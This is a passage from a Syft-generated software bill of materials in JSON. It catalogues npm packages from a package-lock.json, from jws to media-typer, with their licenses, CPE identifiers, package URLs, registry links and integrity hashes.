ws@4.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jws/-/jws-4.0.1.tgz","integrity":"sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==","dependencies":{"jwa":"^2.0.1","safe-buffer":"^5.0.1"}}},{"id":"9ec1624bf944fe34","name":"leac","version":"0.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:leac:leac:0.6.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/leac@0.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/leac/-/leac-0.6.0.tgz","integrity":"sha512-y+SqErxb8h7nE/fiEX07jsbuhrpO9lL8eca7/Y1nuWV2moNlXhyd59iDGcRf6moVyDMbmTNzL40SUyrFU/yDpg==","dependencies":null}},{"id":"a8f0bd77b399e569","name":"lilconfig","version":"3.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lilconfig:lilconfig:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lilconfig@3.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lilconfig/-/lilconfig-3.1.3.tgz","integrity":"sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw==","dependencies":null}},{"id":"7ebb3add1191948c","name":"limiter","version":"1.1.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:limiter:limiter:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/limiter@1.1.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/limiter/-/limiter-1.1.5.tgz","integrity":"sha512-FWWMIEOxz3GwUI4Ts/IvgVy6LPvoMPgjMdQ185nN6psJyBJ4yOpzqm695/h5umdLJg2vW3GR5iG11MAkR2AzJA==","dependencies":null}},{"id":"17b9850959841637","name":"linebreak","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:linebreak:linebreak:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/linebreak@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/linebreak/-/linebreak-1.1.0.tgz","integrity":"sha512-MHp03UImeVhB7XZtjd0E4n6+3xr5Dq/9xI/5FptGk5FrbDR3zagPa2DS6U8ks/3HjbKWG9Q1M2ufOzxV2qLYSQ==","dependencies":{"base64-js":"0.0.8","unicode-trie":"^2.0.0"}}},{"id":"2f4d4f332c0f6687","name":"lines-and-columns","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lines-and-columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines-and-columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines_and_columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines_and_columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines-and:lines-and-columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines-and:lines_and_columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines_and:lines-and-columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines_and:lines_and_columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines:lines-and-columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lines:lines_and_columns:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lines-and-columns@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz","integrity":"sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==","dependencies":null}},{"id":"e6b383b17df8c845","name":"locate-path","version":"5.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:locate-path:locate-path:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:locate-path:locate_path:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:locate_path:locate-path:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:locate_path:locate_path:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:locate:locate-path:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:locate:locate_path:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/locate-path@5.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz","integrity":"sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==","dependencies":{"p-locate":"^4.1.0"}}},{"id":"ac9c211256bf6980","name":"lodash","version":"4.18.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash:lodash:4.18.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/lodash@4.18.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz","integrity":"sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==","dependencies":null}},{"id":"a5b985768ef9b9f6","name":"lodash.camelcase","version":"4.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.camelcase:lodash.camelcase:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.camelcase@4.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz","integrity":"sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==","dependencies":null}},{"id":"1fdd3c59e36d5b0f","name":"lodash.clonedeep","version":"4.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.clonedeep:lodash.clonedeep:4.5.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.clonedeep@4.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz","integrity":"sha512-H5ZhCF25riFd9uB5UCkVKo61m3S/xZk1x4wA6yp/L3RFP6Z/eHH1ymQcGLo7J3GMPfm0V/7m1tryHuGVxpqEBQ==","dependencies":null}},{"id":"59a8c664dfef6c46","name":"lodash.defaults","version":"4.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.defaults:lodash.defaults:4.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.defaults@4.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz","integrity":"sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ==","dependencies":null}},{"id":"aa93a44741b08e66","name":"lodash.includes","version":"4.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.includes:lodash.includes:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.includes@4.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz","integrity":"sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==","dependencies":null}},{"id":"c84bded77fb6b828","name":"lodash.isarguments","version":"3.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.isarguments:lodash.isarguments:3.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.isarguments@3.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz","integrity":"sha512-chi4NHZlZqZD18a0imDHnZPrDeBbTtVN7GXMwuGdRH9qotxAjYs3aVLKc7zNOG9eddR5Ksd8rvFEBc9SsggPpg==","dependencies":null}},{"id":"df154b64f7d4588a","name":"lodash.isboolean","version":"3.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.isboolean:lodash.isboolean:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.isboolean@3.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz","integrity":"sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==","dependencies":null}},{"id":"e92c8ae8d8c83e78","name":"lodash.isinteger","version":"4.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.isinteger:lodash.isinteger:4.0.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.isinteger@4.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz","integrity":"sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA==","dependencies":null}},{"id":"32689628126e866e","name":"lodash.isnumber","version":"3.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.isnumber:lodash.isnumber:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.isnumber@3.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz","integrity":"sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw==","dependencies":null}},{"id":"a6b14f73240e0d01","name":"lodash.isplainobject","version":"4.0.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.isplainobject:lodash.isplainobject:4.0.6:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.isplainobject@4.0.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz","integrity":"sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA==","dependencies":null}},{"id":"f161741909d3d58f","name":"lodash.isstring","version":"4.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.isstring:lodash.isstring:4.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.isstring@4.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz","integrity":"sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw==","dependencies":null}},{"id":"f5ead8ead936acd7","name":"lodash.once","version":"4.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lodash.once:lodash.once:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lodash.once@4.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz","integrity":"sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg==","dependencies":null}},{"id":"22165934193ce3c8","name":"long","version":"5.3.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:long:long:5.3.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/long@5.3.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/long/-/long-5.3.2.tgz","integrity":"sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==","dependencies":null}},{"id":"01ac139389c8bf08","name":"loose-envify","version":"1.4.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:loose-envify:loose-envify:1.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:loose-envify:loose_envify:1.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:loose_envify:loose-envify:1.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:loose_envify:loose_envify:1.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:loose:loose-envify:1.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:loose:loose_envify:1.4.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/loose-envify@1.4.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz","integrity":"sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==","dependencies":{"js-tokens":"^3.0.0 || ^4.0.0"}}},{"id":"d68cb2f643232396","name":"lru-cache","version":"10.4.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:isaacs:lru-cache:10.4.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/lru-cache@10.4.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz","integrity":"sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==","dependencies":null}},{"id":"3a3d54b6437f39f3","name":"lru-cache","version":"6.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:isaacs:lru-cache:6.0.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/lru-cache@6.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz","integrity":"sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==","dependencies":{"yallist":"^4.0.0"}}},{"id":"adf63f866928cf12","name":"lru-memoizer","version":"2.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lru-memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lru-memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lru_memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lru_memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lru:lru-memoizer:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lru:lru_memoizer:2.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lru-memoizer@2.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lru-memoizer/-/lru-memoizer-2.3.0.tgz","integrity":"sha512-GXn7gyHAMhO13WSKrIiNfztwxodVsP8IoZ3XfrJV4yH2x0/OeTO/FIaAHTY5YekdGgW94njfuKmyyt1E0mR6Ug==","dependencies":{"lodash.clonedeep":"^4.5.0","lru-cache":"6.0.0"}}},{"id":"9a372e50af0fe0ae","name":"lucide-react","version":"0.376.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:lucide-react:lucide-react:0.376.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lucide-react:lucide_react:0.376.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lucide_react:lucide-react:0.376.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lucide_react:lucide_react:0.376.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lucide:lucide-react:0.376.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:lucide:lucide_react:0.376.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/lucide-react@0.376.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/lucide-react/-/lucide-react-0.376.0.tgz","integrity":"sha512-g91IX3ERD6yUR1TL2dsL4BkcGygpZz/EsqjAeL/kcRQV0EApIOr/9eBfKhYOVyQIcGGuotFGjF3xKLHMEz+b7g==","dependencies":null}},{"id":"87a83232f7674dbc","name":"math-intrinsics","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:math-intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:math-intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:math_intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:math_intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:math:math-intrinsics:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:math:math_intrinsics:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/math-intrinsics@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz","integrity":"sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==","dependencies":null}},{"id":"1dbf081258d17462","name":"media-engine","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:media-engine:media-engine:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media-engine:media_engine:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media_engine:media-engine:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media_engine:media_engine:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media:media-engine:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media:media_engine:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/media-engine@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/media-engine/-/media-engine-1.0.3.tgz","integrity":"sha512-aa5tG6sDoK+k70B9iEX1NeyfT8ObCKhNDs6lJVpwF6r8vhUfuKMslIcirq6HIUYuuUYLefcEQOn9bSBOvawtwg==","dependencies":null}},{"id":"d88fe6586764efc9","name":"media-typer","version":"0.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:media-typer:media-typer:0.3.0: